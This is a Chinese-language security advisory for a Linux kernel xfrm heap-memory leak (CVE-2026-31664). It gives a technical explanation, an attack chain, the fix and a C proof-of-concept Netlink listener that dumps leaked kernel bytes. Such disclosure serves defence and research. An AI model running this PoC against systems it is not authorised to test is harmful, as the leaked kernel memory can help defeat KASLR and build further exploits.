CVE-2026-31664 CVSS 5.5 中危

CVE-2026-31664 Linux Kernel xfrm内核堆内存泄漏漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31664

漏洞类型

信息泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

该漏洞存在于Linux内核的xfrm（IPsec）框架中。由于`build_polexpire()`函数在构建`struct xfrm_user_polexpire`结构体时，未对`hard`字段后的填充字节执行`memset_after()`清零操作，导致结构体尾部包含未初始化的内核堆内存数据。当内核通过Netlink多播向`XFRMNLGRP_EXPIRE`组发送策略过期消息时，这些未初始化的内存内容会被泄露给用户空间的监听进程。本地低权限攻击者可通过监听Netlink消息获取内核敏感信息，可能辅助绕过安全防御机制。

技术细节

此漏洞属于典型的内核堆信息泄露漏洞。在Linux内核中，结构体通常为了内存对齐会包含填充字节。`build_polexpire()`函数负责构建策略过期的Netlink消息，它在堆上分配`struct xfrm_user_polexpire`结构体并设置字段。然而，与`build_expire()`函数不同，该函数未在设置`hard`字段后清理后续的填充区域。由于内核堆内存会被频繁复用，这些填充字节可能残留着之前释放对象的数据（如函数指针、密钥片段等）。当内核向订阅了`XFRMNLGRP_EXPIRE`组的用户空间进程发送多播消息时，整个结构体（包括未初始化的填充区）被拷贝到用户空间。攻击者只需拥有本地低权限，编写简单的Netlink监听程序即可捕获这些消息，通过分析填充位的数据推断内核内存布局，进而为KASLR绕过或内核利用链构建提供情报。修复方法是在发送前调用`memset_after()`显式清零尾部。

攻击链分析

STEP 1

获取访问权限

攻击者获取目标Linux系统的本地低权限用户访问权限。

STEP 2

建立监听

攻击者创建一个Netlink套接字，并加入XFRMNLGRP_EXPIRE多播组，准备接收内核发送的IPsec策略过期消息。

STEP 3

触发漏洞条件

等待或诱导系统触发xfrm策略过期事件，导致内核调用`build_polexpire()`函数构建消息。

STEP 4

信息泄露

内核将包含未初始化堆内存填充字节的结构体发送给攻击者。攻击者捕获数据包并提取其中的敏感内核内存内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

// PoC for CVE-2026-31664: Kernel Heap Leak in xfrm
// Compile: gcc -o poc_leak poc_leak.c
// This listener subscribes to XFRMNLGRP_EXPIRE and prints received payloads.
// Non-zero bytes after the 'hard' field indicate leaked kernel memory.

#define XFRMNLGRP_EXPIRE 2
#define NETLINK_XFRM 21

int main() {
    int fd;
    struct sockaddr_nl sa;
    char buf[4096];
    struct iovec iov = { buf, sizeof(buf) };
    struct msghdr msg = { &sa, sizeof(sa), &iov, 1, NULL, 0, 0 };

    fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (fd < 0) {
        perror("socket");
        return 1;
    }

    memset(&sa, 0, sizeof(sa));
    sa.nl_family = AF_NETLINK;
    // Subscribe to the expire multicast group
    sa.nl_groups = 1 << (XFRMNLGRP_EXPIRE - 1);

    if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(fd);
        return 1;
    }

    printf("[+] Listening for XFRMNLGRP_EXPIRE events...\n");
    printf("[+] Waiting for kernel to trigger policy expiration...\n");

    while (1) {
        ssize_t len = recvmsg(fd, &msg, 0);
        if (len < 0) {
            perror("recvmsg");
            break;
        }

        printf("\n[!] Received %ld bytes. Hex dump:\n", len);
        for (int i = 0; i < len; i++) {
            printf("%02x ", (unsigned char)buf[i]);
            if ((i + 1) % 16 == 0) printf("\n");
        }
        printf("\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (主要内核版本，具体受影响版本需参考各发行版公告)

防御指南

临时缓解措施

建议立即升级Linux内核以修复此内存初始化缺失的问题。在无法立即升级的情况下，应严格限制本地用户的访问权限，并监控异常的Netlink通信活动，虽然完全缓解较为困难，但防止未授权代码执行是基础防护。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表